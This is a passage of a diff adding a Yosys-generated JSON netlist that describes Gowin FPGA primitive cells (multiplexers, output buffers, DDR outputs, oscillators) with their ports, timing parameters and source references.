"c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:162.3-162.26" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 4 ] + } + }, + "$specify$74": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000001011010011", + "T_FALL_MIN": "00000000000000000000001011010011", + "T_FALL_TYP": "00000000000000000000001011010011", + "T_RISE_MAX": "00000000000000000000000111011110", + "T_RISE_MIN": "00000000000000000000000111011110", + "T_RISE_TYP": "00000000000000000000000111011110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:163.3-163.26" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 5 ] + } + } + }, + "netnames": { + "I0": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:156.9-156.11" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:156.12-156.14" + } + }, + "O": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:158.10-158.11" + } + }, + "S0": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:157.9-157.11" + } + } + } + }, + "MUX2_MUX16": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:11.1-15.10" + }, + "ports": { + "I0": { + "direction": "input", + "bits": [ 2 ] + }, + "I1": { + "direction": "input", + "bits": [ 3 ] + }, + "S0": { + "direction": "input", + "bits": [ 4 ] + }, + "O": { + "direction": "output", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "I0": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:12.7-12.9" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:12.10-12.12" + } + }, + "O": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:14.8-14.9" + } + }, + "S0": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:13.7-13.9" + } + } + } + }, + "MUX2_MUX32": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:18.1-22.10" + }, + "ports": { + "I0": { + "direction": "input", + "bits": [ 2 ] + }, + "I1": { + "direction": "input", + "bits": [ 3 ] + }, + "S0": { + "direction": "input", + "bits": [ 4 ] + }, + "O": { + "direction": "output", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "I0": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:19.7-19.9" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:19.10-19.12" + } + }, + "O": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:21.8-21.9" + } + }, + "S0": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:20.7-20.9" + } + } + } + }, + "MUX2_MUX8": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:4.1-8.10" + }, + "ports": { + "I0": { + "direction": "input", + "bits": [ 2 ] + }, + "I1": { + "direction": "input", + "bits": [ 3 ] + }, + "S0": { + "direction": "input", + "bits": [ 4 ] + }, + "O": { + "direction": "output", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "I0": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:5.7-5.9" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:5.10-5.12" + } + }, + "O": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:7.8-7.9" + } + }, + "S0": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:6.7-6.9" + } + } + } + }, + "MUX32": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:45.1-49.10" + }, + "ports": { + "I0": { + "direction": "input", + "bits": [ 2 ] + }, + "I1": { + "direction": "input", + "bits": [ 3 ] + }, + "I2": { + "direction": "input", + "bits": [ 4 ] + }, + "I3": { + "direction": "input", + "bits": [ 5 ] + }, + "I4": { + "direction": "input", + "bits": [ 6 ] + }, + "I5": { + "direction": "input", + "bits": [ 7 ] + }, + "I6": { + "direction": "input", + "bits": [ 8 ] + }, + "I7": { + "direction": "input", + "bits": [ 9 ] + }, + "I8": { + "direction": "input", + "bits": [ 10 ] + }, + "I9": { + "direction": "input", + "bits": [ 11 ] + }, + "I10": { + "direction": "input", + "bits": [ 12 ] + }, + "I11": { + "direction": "input", + "bits": [ 13 ] + }, + "I12": { + "direction": "input", + "bits": [ 14 ] + }, + "I13": { + "direction": "input", + "bits": [ 15 ] + }, + "I14": { + "direction": "input", + "bits": [ 16 ] + }, + "I15": { + "direction": "input", + "bits": [ 17 ] + }, + "I16": { + "direction": "input", + "bits": [ 18 ] + }, + "I17": { + "direction": "input", + "bits": [ 19 ] + }, + "I18": { + "direction": "input", + "bits": [ 20 ] + }, + "I19": { + "direction": "input", + "bits": [ 21 ] + }, + "I20": { + "direction": "input", + "bits": [ 22 ] + }, + "I21": { + "direction": "input", + "bits": [ 23 ] + }, + "I22": { + "direction": "input", + "bits": [ 24 ] + }, + "I23": { + "direction": "input", + "bits": [ 25 ] + }, + "I24": { + "direction": "input", + "bits": [ 26 ] + }, + "I25": { + "direction": "input", + "bits": [ 27 ] + }, + "I26": { + "direction": "input", + "bits": [ 28 ] + }, + "I27": { + "direction": "input", + "bits": [ 29 ] + }, + "I28": { + "direction": "input", + "bits": [ 30 ] + }, + "I29": { + "direction": "input", + "bits": [ 31 ] + }, + "I30": { + "direction": "input", + "bits": [ 32 ] + }, + "I31": { + "direction": "input", + "bits": [ 33 ] + }, + "S0": { + "direction": "input", + "bits": [ 34 ] + }, + "S1": { + "direction": "input", + "bits": [ 35 ] + }, + "S2": { + "direction": "input", + "bits": [ 36 ] + }, + "S3": { + "direction": "input", + "bits": [ 37 ] + }, + "S4": { + "direction": "input", + "bits": [ 38 ] + }, + "O": { + "direction": "output", + "bits": [ 39 ] + } + }, + "cells": { + }, + "netnames": { + "I0": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.7-46.9" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.11-46.13" + } + }, + "I10": { + "hide_name": 0, + "bits": [ 12 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.47-46.50" + } + }, + "I11": { + "hide_name": 0, + "bits": [ 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.52-46.55" + } + }, + "I12": { + "hide_name": 0, + "bits": [ 14 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.57-46.60" + } + }, + "I13": { + "hide_name": 0, + "bits": [ 15 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.62-46.65" + } + }, + "I14": { + "hide_name": 0, + "bits": [ 16 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.67-46.70" + } + }, + "I15": { + "hide_name": 0, + "bits": [ 17 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.72-46.75" + } + }, + "I16": { + "hide_name": 0, + "bits": [ 18 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.77-46.80" + } + }, + "I17": { + "hide_name": 0, + "bits": [ 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.82-46.85" + } + }, + "I18": { + "hide_name": 0, + "bits": [ 20 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.87-46.90" + } + }, + "I19": { + "hide_name": 0, + "bits": [ 21 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.92-46.95" + } + }, + "I2": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.15-46.17" + } + }, + "I20": { + "hide_name": 0, + "bits": [ 22 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.97-46.100" + } + }, + "I21": { + "hide_name": 0, + "bits": [ 23 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.102-46.105" + } + }, + "I22": { + "hide_name": 0, + "bits": [ 24 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.107-46.110" + } + }, + "I23": { + "hide_name": 0, + "bits": [ 25 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.112-46.115" + } + }, + "I24": { + "hide_name": 0, + "bits": [ 26 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.117-46.120" + } + }, + "I25": { + "hide_name": 0, + "bits": [ 27 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.122-46.125" + } + }, + "I26": { + "hide_name": 0, + "bits": [ 28 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.127-46.130" + } + }, + "I27": { + "hide_name": 0, + "bits": [ 29 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.132-46.135" + } + }, + "I28": { + "hide_name": 0, + "bits": [ 30 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.137-46.140" + } + }, + "I29": { + "hide_name": 0, + "bits": [ 31 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.142-46.145" + } + }, + "I3": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.19-46.21" + } + }, + "I30": { + "hide_name": 0, + "bits": [ 32 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.147-46.150" + } + }, + "I31": { + "hide_name": 0, + "bits": [ 33 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.152-46.155" + } + }, + "I4": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.23-46.25" + } + }, + "I5": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.27-46.29" + } + }, + "I6": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.31-46.33" + } + }, + "I7": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.35-46.37" + } + }, + "I8": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.39-46.41" + } + }, + "I9": { + "hide_name": 0, + "bits": [ 11 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:46.43-46.45" + } + }, + "O": { + "hide_name": 0, + "bits": [ 39 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:48.8-48.9" + } + }, + "S0": { + "hide_name": 0, + "bits": [ 34 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:47.7-47.9" + } + }, + "S1": { + "hide_name": 0, + "bits": [ 35 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:47.11-47.13" + } + }, + "S2": { + "hide_name": 0, + "bits": [ 36 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:47.15-47.17" + } + }, + "S3": { + "hide_name": 0, + "bits": [ 37 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:47.19-47.21" + } + }, + "S4": { + "hide_name": 0, + "bits": [ 38 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:47.23-47.25" + } + } + } + }, + "MUX4": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:25.1-29.10" + }, + "ports": { + "I0": { + "direction": "input", + "bits": [ 2 ] + }, + "I1": { + "direction": "input", + "bits": [ 3 ] + }, + "I2": { + "direction": "input", + "bits": [ 4 ] + }, + "I3": { + "direction": "input", + "bits": [ 5 ] + }, + "S0": { + "direction": "input", + "bits": [ 6 ] + }, + "S1": { + "direction": "input", + "bits": [ 7 ] + }, + "O": { + "direction": "output", + "bits": [ 8 ] + } + }, + "cells": { + }, + "netnames": { + "I0": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:26.7-26.9" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:26.11-26.13" + } + }, + "I2": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:26.15-26.17" + } + }, + "I3": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:26.19-26.21" + } + }, + "O": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:28.8-28.9" + } + }, + "S0": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:27.7-27.9" + } + }, + "S1": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:27.11-27.13" + } + } + } + }, + "MUX8": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:32.1-36.10" + }, + "ports": { + "I0": { + "direction": "input", + "bits": [ 2 ] + }, + "I1": { + "direction": "input", + "bits": [ 3 ] + }, + "I2": { + "direction": "input", + "bits": [ 4 ] + }, + "I3": { + "direction": "input", + "bits": [ 5 ] + }, + "I4": { + "direction": "input", + "bits": [ 6 ] + }, + "I5": { + "direction": "input", + "bits": [ 7 ] + }, + "I6": { + "direction": "input", + "bits": [ 8 ] + }, + "I7": { + "direction": "input", + "bits": [ 9 ] + }, + "S0": { + "direction": "input", + "bits": [ 10 ] + }, + "S1": { + "direction": "input", + "bits": [ 11 ] + }, + "S2": { + "direction": "input", + "bits": [ 12 ] + }, + "O": { + "direction": "output", + "bits": [ 13 ] + } + }, + "cells": { + }, + "netnames": { + "I0": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:33.7-33.9" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:33.11-33.13" + } + }, + "I2": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:33.15-33.17" + } + }, + "I3": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:33.19-33.21" + } + }, + "I4": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:33.23-33.25" + } + }, + "I5": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:33.27-33.29" + } + }, + "I6": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:33.31-33.33" + } + }, + "I7": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:33.35-33.37" + } + }, + "O": { + "hide_name": 0, + "bits": [ 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:35.8-35.9" + } + }, + "S0": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:34.7-34.9" + } + }, + "S1": { + "hide_name": 0, + "bits": [ 11 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:34.11-34.13" + } + }, + "S2": { + "hide_name": 0, + "bits": [ 12 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:34.15-34.17" + } + } + } + }, + "OBUF": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:562.1-569.10" + }, + "ports": { + "O": { + "direction": "output", + "bits": [ 2 ] + }, + "I": { + "direction": "input", + "bits": [ 3 ] + } + }, + "cells": { + "$specify$142": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000000000000000", + "T_FALL_MIN": "00000000000000000000000000000000", + "T_FALL_TYP": "00000000000000000000000000000000", + "T_RISE_MAX": "00000000000000000000000000000000", + "T_RISE_MIN": "00000000000000000000000000000000", + "T_RISE_TYP": "00000000000000000000000000000000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:565.3-565.16" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 3 ] + } + } + }, + "netnames": { + "I": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:562.29-562.30" + } + }, + "O": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:562.20-562.21" + } + } + } + }, + "ODDR": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:898.1-907.10" + }, + "parameter_default_values": { + "INIT": "00000000000000000000000000000000", + "TXCLK_POL": "00000000000000000000000000000000" + }, + "ports": { + "D0": { + "direction": "input", + "bits": [ 2 ] + }, + "D1": { + "direction": "input", + "bits": [ 3 ] + }, + "TX": { + "direction": "input", + "bits": [ 4 ] + }, + "CLK": { + "direction": "input", + "bits": [ 5 ] + }, + "Q0": { + "direction": "output", + "bits": [ 6 ] + }, + "Q1": { + "direction": "output", + "bits": [ 7 ] + } + }, + "cells": { + }, + "netnames": { + "CLK": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:902.8-902.11" + } + }, + "D0": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:899.8-899.10" + } + }, + "D1": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:900.8-900.10" + } + }, + "Q0": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:903.9-903.11" + } + }, + "Q1": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:904.9-904.11" + } + }, + "TX": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:901.8-901.10" + } + } + } + }, + "ODDRC": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:910.1-920.10" + }, + "parameter_default_values": { + "INIT": "00000000000000000000000000000000", + "TXCLK_POL": "00000000000000000000000000000000" + }, + "ports": { + "D0": { + "direction": "input", + "bits": [ 2 ] + }, + "D1": { + "direction": "input", + "bits": [ 3 ] + }, + "CLEAR": { + "direction": "input", + "bits": [ 4 ] + }, + "TX": { + "direction": "input", + "bits": [ 5 ] + }, + "CLK": { + "direction": "input", + "bits": [ 6 ] + }, + "Q0": { + "direction": "output", + "bits": [ 7 ] + }, + "Q1": { + "direction": "output", + "bits": [ 8 ] + } + }, + "cells": { + }, + "netnames": { + "CLEAR": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:913.8-913.13" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:915.8-915.11" + } + }, + "D0": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:911.8-911.10" + } + }, + "D1": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:912.8-912.10" + } + }, + "Q0": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:916.9-916.11" + } + }, + "Q1": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:917.9-917.11" + } + }, + "TX": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:914.8-914.10" + } + } + } + }, + "OSC": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1911.1-1916.10" + }, + "parameter_default_values": { + "DEVICE": "GW1N-4", + "FREQ_DIV": "00000000000000000000000001100100" + }, + "ports": { + "OSCOUT": { + "direction": "output", + "bits": [ 2 ] + } + }, + "cells": { + }, + "netnames": { + "OSCOUT": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1912.8-1912.14" + } + } + } + }, + "OSCF": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1928.1-1935.10" + }, + "parameter_default_values": { + "FREQ_DIV": "00000000000000000000000001100100" + }, + "ports": { + "OSCOUT": { + "direction": "output", + "bits": [ 2 ] + }, + "OSCOUT30M": { + "direction": "output", + "bits": [ 3 ] + }, + "OSCEN": { + "direction": "input", + "bits": [ 4 ] + } + }, + "cells": { + }, + "netnames": { + "OSCEN": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1929.7-1929.12" + } + }, + "OSCOUT": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1931.8-1931.14" + } + }, + "OSCOUT30M": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1932.8-1932.17" + } + } + } + }, + "OSCH": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1938.1-1942.10" + }, + "parameter_default_values": { + "FREQ_DIV": "00000000000000000000000001100000" + }, + "ports": { + "OSCOUT": { + "direction": "output", + "bits": [ 2 ] + } + }, + "cells": { + }, + "netnames": { + "OSCOUT": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1939.8-1939.14" + } + } + } + }, + "OSCO": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1952.1-1959.10" + }, + "parameter_default_values": { + "FREQ_DIV": "00000000000000000000000001100100", + "REGULATOR_EN": "0" + }, + "ports": { + "OSCOUT": { + "direction": "output", + "bits": [ 2 ] + }, + "OSCEN": { + "direction": "input", + "bits": [ 3 ] + } + }, + "cells": { + }, + "netnames": { + "OSCEN": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1953.7-1953.12" + } + }, + "OSCOUT": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1955.8-1955.14" + } + } + } + }, + "OSCW": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1945.1-1949.10" + }, + "parameter_default_values": { + "FREQ_DIV": "00000000000000000000000001010000" + }, + "ports": { + "OSCOUT": { + "direction": "output", + "bits": [ 2 ] + } + }, + "cells": { + }, + "netnames": { + "OSCOUT": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1946.8-1946.14" + } + } + } + }, + "OSCZ": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1919.1-1925.10" + }, + "parameter_default_values": { + "FREQ_DIV": "00000000000000000000000001100100" + }, + "ports": { + "OSCOUT": { + "direction": "output", + "bits": [ 2 ] + }, + "OSCEN": { + "direction": "input", + "bits": [ 3 